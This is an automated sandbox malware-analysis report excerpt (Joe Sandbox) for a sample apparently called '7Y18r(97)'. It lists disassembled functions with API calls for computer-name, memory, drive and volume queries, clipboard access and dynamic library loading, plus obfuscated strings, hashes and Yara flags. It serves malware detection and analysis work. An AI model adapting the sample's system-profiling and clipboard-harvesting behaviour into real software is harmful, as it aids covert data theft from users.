                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: Object$DeleteSelect$CallbackDispatcherUser
                  • String ID:
                  • API String ID: 4290106128-3916222277
                  • Opcode ID: 7dd9abf5052419da96595e5ddc166959adabbb6f5a87aa4530ad64ad8abb684f
                  • Instruction ID: 80b33919070161b634a7195bf6804264f2e1f24080c1526448b53a9761a2dc93
                  • Opcode Fuzzy Hash: 7dd9abf5052419da96595e5ddc166959adabbb6f5a87aa4530ad64ad8abb684f
                  • Instruction Fuzzy Hash: 00915BB4605B008FC3A4EF68D585A16BBF1FB49700B108A6DE89AC7B54DB30F845CF92
                  Function 02AD7EA1 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 427COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 535 2ad7ea1-2ad7fe5 call 2aeb840 538 2ad7fea-2ad8057 GetComputerNameExA 535->538 539 2ad8059 538->539 540 2ad80c4-2ad80cd 538->540 541 2ad8060-2ad80c2 539->541 542 2ad80ed-2ad80f3 540->542 543 2ad80cf-2ad80df 540->543 541->540 541->541 544 2ad80f6-2ad8102 542->544 545 2ad80e0-2ad80e9 543->545 546 2ad811b-2ad817d GetComputerNameExA 544->546 547 2ad8104-2ad810a 544->547 545->545 548 2ad80eb 545->548 550 2ad81cd-2ad81d6 546->550 551 2ad817f 546->551 549 2ad8110-2ad8119 547->549 548->544 549->546 549->549 553 2ad81d8-2ad81df 550->553 554 2ad81eb-2ad81f7 550->554 552 2ad8180-2ad81cb 551->552 552->550 552->552 555 2ad81e0-2ad81e9 553->555 556 2ad81f9-2ad81ff 554->556 557 2ad820b-2ad8286 554->557 555->554 555->555 558 2ad8200-2ad8209 556->558 560 2ad82df-2ad82e8 557->560 561 2ad8288 557->561 558->557 558->558 562 2ad82fb-2ad8307 560->562 563 2ad82ea 560->563 564 2ad8290-2ad82dd 561->564 566 2ad8309-2ad830f 562->566 567 2ad831b-2ad8396 call 2aeb840 562->567 565 2ad82f0-2ad82f9 563->565 564->560 564->564 565->562 565->565 568 2ad8310-2ad8319 566->568 572 2ad8398 567->572 573 2ad83e2-2ad83eb 567->573 568->567 568->568 574 2ad83a0-2ad83e0 572->574 575 2ad83ed-2ad83f3 573->575 576 2ad840b-2ad841b 573->576 574->573 574->574 578 2ad8400-2ad8409 575->578 577 2ad8439-2ad8445 576->577 579 2ad844b-2ad8452 577->579 580 2ad84e0-2ad84e3 577->580 578->576 578->578 581 2ad8454-2ad846f 579->581 582 2ad8420-2ad8425 579->582 583 2ad84e9-2ad8531 580->583 585 2ad8471-2ad8474 581->585 586 2ad84a0-2ad84a8 581->586 584 2ad842a-2ad8433 582->584 587 2ad8581-2ad858a 583->587 588 2ad8533 583->588 584->577 590 2ad84e5-2ad84e7 584->590 585->586 593 2ad8476-2ad8493 585->593 586->584 594 2ad84aa-2ad84db 586->594 591 2ad858c-2ad8592 587->591 592 2ad85ab-2ad85ae call 2add190 587->592 589 2ad8540-2ad857f 588->589 589->587 589->589 590->583 595 2ad85a0-2ad85a9 591->595 597 2ad85b3-2ad85ba 592->597 593->584 594->584 595->592 595->595
                  APIs
                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02AD8011
                  • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 02AD8139
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: ComputerName
                  • String ID: ,"K$ido1$kvri
                  • API String ID: 3545744682-3663296290
                  • Opcode ID: 8f63dc6383ebe67d256bfea06b49d8a37da3eec1f0e8bbd4b9bd89842ad878b0
                  • Instruction ID: e19c4b9edd1835f24b38996119bfddaed30ce3f843cc8bbf95f09dfee748acfe
                  • Opcode Fuzzy Hash: 8f63dc6383ebe67d256bfea06b49d8a37da3eec1f0e8bbd4b9bd89842ad878b0
                  • Instruction Fuzzy Hash: BAF16E70504B418ED735CF39C4947A3BBE1AF16305F488A5DD4EB8B682DB39B54ACBA0
                  Function 02AD85C7 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 456COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 726 2ad85c7-2ad8600 727 2ad8655-2ad865e 726->727 728 2ad8602 726->728 730 2ad867b-2ad8962 727->730 731 2ad8660-2ad8666 727->731 729 2ad8610-2ad8653 728->729 729->727 729->729 734 2ad89c8-2ad89d1 730->734 735 2ad8964 730->735 732 2ad8670-2ad8679 731->732 732->730 732->732 737 2ad89eb-2ad89f5 call 2ae3cd0 734->737 738 2ad89d3-2ad89d9 734->738 736 2ad8970-2ad89c6 735->736 736->734 736->736 741 2ad89fa-2ad8a06 737->741 740 2ad89e0-2ad89e9 738->740 740->737 740->740 742 2ad8a08-2ad8a0f 741->742 743 2ad8a1b-2ad8a40 call 2aeb840 741->743 744 2ad8a10-2ad8a19 742->744 746 2ad8a45-2ad8a68 GetPhysicallyInstalledSystemMemory 743->746 744->743 744->744 747 2ad8abe-2ad8acb 746->747 748 2ad8a6a-2ad8a73 746->748 751 2ad8ae3-2ad8b14 747->751 749 2ad8acd-2ad8ad2 748->749 750 2ad8a75 748->750 755 2ad8ad4-2ad8ae0 749->755 756 2ad8ab1-2ad8abc 749->756 754 2ad8a80-2ad8aaa 750->754 752 2ad8b7a-2ad8bcb 751->752 753 2ad8b16 751->753 758 2ad8bcd-2ad8bcf 752->758 759 2ad8c02-2ad8c0b 752->759 757 2ad8b20-2ad8b78 753->757 754->754 760 2ad8aac-2ad8aaf 754->760 755->751 756->751 757->752 757->757 761 2ad8bd0-2ad8c00 758->761 762 2ad8c0d-2ad8c13 759->762 763 2ad8c2b-2ad8c33 759->763 760->755 760->756 761->759 761->761 764 2ad8c20-2ad8c29 762->764 765 2ad8c4b-2ad8c57 763->765 766 2ad8c35-2ad8c36 763->766 764->763 764->764 768 2ad8c59-2ad8c5f 765->768 769 2ad8c6b-2ad8cd8 765->769 767 2ad8c40-2ad8c49 766->767 767->765 767->767 770 2ad8c60-2ad8c69 768->770 771 2ad8cda 769->771 772 2ad8d24-2ad8d2d 769->772 770->769 770->770 773 2ad8ce0-2ad8d22 771->773 774 2ad8d2f-2ad8d35 772->774 775 2ad8d4b-2ad8d57 772->775 773->772 773->773 776 2ad8d40-2ad8d49 774->776 777 2ad8d59-2ad8d5f 775->777 778 2ad8d6b-2ad8de8 775->778 776->775 776->776 779 2ad8d60-2ad8d69 777->779 779->778 779->779
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: 9'> $XTvM
                  • API String ID: 0-1218255337
                  • Opcode ID: a55a3a162f9d4754d3a3b36eea29a423dd1a05e56b0314afce1f2fae9f486724
                  • Instruction ID: 910f0a6e486e2db6d0a1f6fab3b3ac2554ab5f60cff7ae18a4dd509fd89b2b37
                  • Opcode Fuzzy Hash: a55a3a162f9d4754d3a3b36eea29a423dd1a05e56b0314afce1f2fae9f486724
                  • Instruction Fuzzy Hash: 0AF17E70105B818FD735CF29C4947A3BBF1AF16304F488A6DC4EB8B692DB39A54ACB51
                  Function 02AD88FF Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 385COMMON
                  Download Yara Rule
                  APIs
                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02AD8A4F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: InstalledMemoryPhysicallySystem
                  • String ID: 9'> $XTvM
                  • API String ID: 3960555810-1218255337
                  • Opcode ID: 92ec337f123ca93989728bd43f67f91df0bad6bb3cd723bd43b0e31b853df68d
                  • Instruction ID: 454f687c5f264c512ccf05779dba852330f1877feb22336ea7f4fb7efe6da1d4
                  • Opcode Fuzzy Hash: 92ec337f123ca93989728bd43f67f91df0bad6bb3cd723bd43b0e31b853df68d
                  • Instruction Fuzzy Hash: 12D17E70104B418EE735CF39C4947A7BBF1AF16304F188A6DC4EB8B692DB39A54ACB51
                  Function 025C0320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNELBASE(00000000,?,?), ref: 025C03B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: .dll
                  • API String ID: 1029625771-2738580789
                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                  • Instruction ID: 09882cfc6ae3365dbb044e879d5e4c15d87cd3f6e992e5cffb0009c66dbcb71c
                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                  • Instruction Fuzzy Hash: 9021D231618695CFEB21DFE8C884B6D7FA4BF05A24F28406CD8458BA81E770E845CB94
                  Function 02AB9980 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 02AB9A3C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                  • API String ID: 621844428-780655312
                  • Opcode ID: 95b48589325a31effd8220f2b93375acd039368e01a35f3e3e787b74750eeffc
                  • Instruction ID: 600a632c5d315261d3e9671a5c425b88fef0fc63b3dba7ae7911926d2402f9a9
                  • Opcode Fuzzy Hash: 95b48589325a31effd8220f2b93375acd039368e01a35f3e3e787b74750eeffc
                  • Instruction Fuzzy Hash: BD1114B0448302CEEB42AF64C2443AB7BFCAF46354F00891DD68686186DF79824BCF93
                  Function 02AE9985 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • GetLogicalDrives.KERNEL32 ref: 02AE9985
                  • GetLogicalDrives.KERNELBASE ref: 02AE9990
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: DrivesLogical
                  • String ID:
                  • API String ID: 999431828-0
                  • Opcode ID: 4913d5b1bdf67b8d02e2bcbba70fede13b23ff6e197c08c873e0bb750e634983
                  • Instruction ID: b1a2752b5e2b622e46c478c60a684fe717a8b83f121f990955272a8fbf6613d6
                  • Opcode Fuzzy Hash: 4913d5b1bdf67b8d02e2bcbba70fede13b23ff6e197c08c873e0bb750e634983
                  • Instruction Fuzzy Hash: BEA001308A4101DF82C82FA1A86C0193AB4F686703B001C60E2168404ECF388826CEC0
                  Function 025BEF72 Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 025BEFEC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                  • Instruction ID: afde1d5307536f3829e02872898835319432bd76886762ac665afcb45eae76a5
                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                  • Instruction Fuzzy Hash: D6B1C276900A06EFDB229EA4CC80BF7FBA9FF49314F140919F94992950E731E550CBA9
                  Function 02AE97B2 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 02AE9858
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: f372a0fbfdb781a99a1bda485f2d44e8f056809c9915d6853ada742d4c92ace8
                  • Instruction ID: a919d1750aa36651c3b3cdfd6b39c5f029603ad51bfab82cbc8ba46f7453f044
                  • Opcode Fuzzy Hash: f372a0fbfdb781a99a1bda485f2d44e8f056809c9915d6853ada742d4c92ace8
                  • Instruction Fuzzy Hash: C5118CB01083029BD308DF15D8A061FBBE6EF81704F258E1CE5E65B695CB38D916CB8A
                  Function 02AE3DD6 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02AE3E10
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: InformationVolume
                  • String ID:
                  • API String ID: 2039140958-0
                  • Opcode ID: 9742a0f9191d286734a7a8b700acd32e7fc0bc714844aaadb67558baafca4a6d
                  • Instruction ID: f54e567f23a5f722ebbab26430d1324f515c30759c08266b75672e0441063d3f
                  • Opcode Fuzzy Hash: 9742a0f9191d286734a7a8b700acd32e7fc0bc714844aaadb67558baafca4a6d
                  • Instruction Fuzzy Hash: 90F09221ADD3C16FE32256706C22BA53F24DB03705F1A04DBEA81994D2D869A859C7B6
                  Function 02AE9CD2 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlReAllocateHeap.NTDLL(?,00000000), ref: 02AE9CD9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: f4e6d8083b60c972d7c7de3ee9ff3e4341daf4bf296331050b81ad0a29f3b847
                  • Instruction ID: 34cb717cef792ea3ded5fc57e646a48d4be71d3eae97358da1aee996cb14bb64
                  • Opcode Fuzzy Hash: f4e6d8083b60c972d7c7de3ee9ff3e4341daf4bf296331050b81ad0a29f3b847
                  • Instruction Fuzzy Hash: BFC02B31A80101EEDE042B80FC05BF97738E780322F000061F61581440C7B05CF2C790
                  Function 02AE7FDD Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlFreeHeap.NTDLL(?,00000000), ref: 02AE7FE2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: a9e50c54ca84911fc92972a1d8a8ed8f50e43d4c1bdc823ffcfb31346ff97c5b
                  • Instruction ID: 3fc6a30654176564c9e2b97058b704dcce0158f4dd5b08a3fb78b43d49b8cd9d
                  • Opcode Fuzzy Hash: a9e50c54ca84911fc92972a1d8a8ed8f50e43d4c1bdc823ffcfb31346ff97c5b
                  • Instruction Fuzzy Hash: 8CB09230DC41018BC2015E41D844B60F638A71E702F106800A618A7596C671E8A18A48

                  Non-executed Functions

                  Function 02ADED00 Relevance: 9.2, APIs: 6, Instructions: 163clipboardCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: Clipboard$DataGlobalLongOpenWindow
                  • String ID:
                  • API String ID: 1701813514-0
                  • Opcode ID: 7b01ed82cdc7748afce76b176acff3a742bc4644972b7ccb5104d1ca91882ae9
                  • Instruction ID: 831d135c844e3f093cab7909737b8473b60cdb8947abd6e0debebf68a362b83a
                  • Opcode Fuzzy Hash: 7b01ed82cdc7748afce76b176acff3a742bc4644972b7ccb5104d1ca91882ae9
                  • Instruction Fuzzy Hash: EB6149B0508B41DFD321DF39C544716BBF1AB0A714F048A5DE49A8B791DB35F858CB92
                  Function 0257BB5F Relevance: 9.1, Strings: 7, Instructions: 386COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ADXY$MQOH$SQMP$TPFR$ZTRZ$\AYL$nM
                  • API String ID: 0-3512707261
                  • Opcode ID: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
                  • Instruction ID: f95897937a79d3b2b094245ca61ed06eb1df56da5dba417444bff7c260db15cc
                  • Opcode Fuzzy Hash: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
                  • Instruction Fuzzy Hash: 92D19CB15083818FC325CF29C49076AFFE1BF96318F188A5DE8D99B352C7399506CB56
                  Function 02ABA000 Relevance: 9.1, Strings: 7, Instructions: 386COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: ADXY$MQOH$SQMP$TPFR$ZTRZ$\AYL$nM
                  • API String ID: 0-3512707261
                  • Opcode ID: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
                  • Instruction ID: f5f8025f2d4b454a6b997adf01484a1a9f7d712f766b92e5816f4bad6ff8bb43
                  • Opcode Fuzzy Hash: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
                  • Instruction Fuzzy Hash: 3FD18CB05083808FC316CF29C4907AAFFE1BFD6254F188A9DE4D99B352CB399546CB56
                  Function 02589E2A Relevance: 8.1, Strings: 6, Instructions: 552COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Kk$[$NrJB$fc$j_]X$nn n$uHN;
                  • API String ID: 0-2328874454
                  • Opcode ID: 7ead99a86678e0b6b1f45d69108d231a6f6c8bd0b94f08c0c960dc8055f25063
                  • Instruction ID: 4f9ed8c438239f0c8ae520735280f4c624b772ed34e58921347d25d7d294a74e
                  • Opcode Fuzzy Hash: 7ead99a86678e0b6b1f45d69108d231a6f6c8bd0b94f08c0c960dc8055f25063
                  • Instruction Fuzzy Hash: 0E12F17160C3908FD729DF24C4A076ABBE2BFD6304F188A5EE4D65B381D7B58406CB56
                  Function 02AC82CB Relevance: 8.1, Strings: 6, Instructions: 552COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: Kk$[$NrJB$fc$j_]X$nn n$uHN;
                  • API String ID: 0-2328874454
                  • Opcode ID: 5ba1e879b7fd7146f20fbbdd93c5d7766a1e5bd7221fa32a6d3c3cd621befe8e
                  • Instruction ID: 20a72e93ef350a019b32ffa999d361783dcaa5ef74a1ea1fc59f4dc7f3a9451c
                  • Opcode Fuzzy Hash: 5ba1e879b7fd7146f20fbbdd93c5d7766a1e5bd7221fa32a6d3c3cd621befe8e
                  • Instruction Fuzzy Hash: EC12A37150C3918FD726CF25C4907ABBBE2BF96304F284A5DE4D68B392DB399406CB52
                  Function 0258994A Relevance: 7.8, Strings: 6, Instructions: 325COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: -j/$3Y=[$BE$S=W?$f%G'$QS
                  • API String ID: 0-522869440
                  • Opcode ID: 908fe09d4afd9a1f84c9444a321afcc9095a1f4dca7b9830e65b1abe7a849fcd
                  • Instruction ID: 8b50d3171da1b7066bc4489417e575dce1637fca006b31367d8ac991b8e60d53
                  • Opcode Fuzzy Hash: 908fe09d4afd9a1f84c9444a321afcc9095a1f4dca7b9830e65b1abe7a849fcd
                  • Instruction Fuzzy Hash: 7ED145B19187809BD320DF24C49066BBBE2FFC9308F145A1DF5E9AB251D774D9068F8A
                  Function 02AD9657 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 329COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: %05+$1=#:
                  • API String ID: 0-340930863
                  • Opcode ID: 0b976e5788c98e5cccda9782924b0d1da521723e3a10cba23e6b78bd1d10fd90
                  • Instruction ID: 167cf4e297dbbfb49725ef9bac908a350c0e2728126200c1ec264aa852a8c339
                  • Opcode Fuzzy Hash: 0b976e5788c98e5cccda9782924b0d1da521723e3a10cba23e6b78bd1d10fd90
                  • Instruction Fuzzy Hash: 6CB1DF70504B828BD335CF29C884767BBE2AF92318F188A5DD4EB4BB96DB35E405CB51
                  Function 025AA3DF Relevance: 4.4, Strings: 3, Instructions: 627COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /.)($/.)($/.)(
                  • API String ID: 0-1945924264
                  • Opcode ID: 1eba44e59e95c52f9c6f05bd98f71571d36518c52c4b7eb5964253d5087a65a5
                  • Instruction ID: d00385c170864a6fde05e25ff14c14e4f4ddd7111c1d5b662b0cf4ce13d34745
                  • Opcode Fuzzy Hash: 1eba44e59e95c52f9c6f05bd98f71571d36518c52c4b7eb5964253d5087a65a5
                  • Instruction Fuzzy Hash: 4622BD716083419FC718CF18C8A1B2EBBF2FB89314F188A2DE5958B351E775E905CB5A
                  Function 02AE8880 Relevance: 4.4, Strings: 3, Instructions: 627COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: /.)($/.)($/.)(
                  • API String ID: 0-1945924264
                  • Opcode ID: 71ee6f0dd517092e6f4c265ad24e0af65b2146c7259fd4fce5a812c5629f92e0
                  • Instruction ID: 9fa85e74ef059627a9e2cbb9947f5e4922be248df4754a42838bb33660628fdf
                  • Opcode Fuzzy Hash: 71ee6f0dd517092e6f4c265ad24e0af65b2146c7259fd4fce5a812c5629f92e0
                  • Instruction Fuzzy Hash: 502291716093419FCB15CF18C490B2ABBE2FF89314F188A6DE5D58B361DB39E906CB52
                  Function 02570048 Relevance: 4.3, Strings: 3, Instructions: 505COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: wv+$;@u$R/)
                  • API String ID: 0-4201909522
                  • Opcode ID: 50555e7abd98080a5186b58892d30b2c8a9d49c93854f02e577350cd27d8e091
                  • Instruction ID: 65066d15d2945625a7cff04305da154da52ed68ebd4d66b636a6b219f208f242
                  • Opcode Fuzzy Hash: 50555e7abd98080a5186b58892d30b2c8a9d49c93854f02e577350cd27d8e091
                  • Instruction Fuzzy Hash: C812DD72D043248FDB18CF75EC956AA7BA2FB80305F42833EC5069B564CB346566DF8A
                  Function 02576E3F Relevance: 4.2, Strings: 3, Instructions: 431COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )$IEND$VUUU
                  • API String ID: 0-801940756
                  • Opcode ID: 887fd6c5f1beaee52e5b4c67e2824365d77693ebf026fb5ed516f831fd0c7d2e
                  • Instruction ID: 117605f7e013ba86b05490837c503582a672dc236e1ca4ec7a8e5c16f314b10e
                  • Opcode Fuzzy Hash: 887fd6c5f1beaee52e5b4c67e2824365d77693ebf026fb5ed516f831fd0c7d2e
                  • Instruction Fuzzy Hash: EBE1EFB2A483459FD710CF18E89075FBBE5BB98304F04892DF9999B381E375E905CB86
                  Function 0257793F Relevance: 3.4, Strings: 2, Instructions: 859COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0$8
                  • API String ID: 0-46163386
                  • Opcode ID: 51ff3381b181d209137894d56f582cef63af05ae57f9d1e393f07cfca215252e
                  • Instruction ID: 083db620073c19f163d2f05026348c98c838382c352b76909ba61496cd3b22a3
                  • Opcode Fuzzy Hash: 51ff3381b181d209137894d56f582cef63af05ae57f9d1e393f07cfca215252e
                  • Instruction Fuzzy Hash: E77258716083419FD714CF28D844BAABBE2BFC8318F18892DF9998B391D375D944CB96
                  Function 02AB5DE0 Relevance: 3.4, Strings: 2, Instructions: 859COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: 0$8
                  • API String ID: 0-46163386
                  • Opcode ID: 319527ce57500016c0ee3328aaaa88bd9801431d57f974024b34871fba5e5918
                  • Instruction ID: 4fd4c55a7e6052378cde718ebff0e9613a8df833bab58bc17c77156ec1a495b5
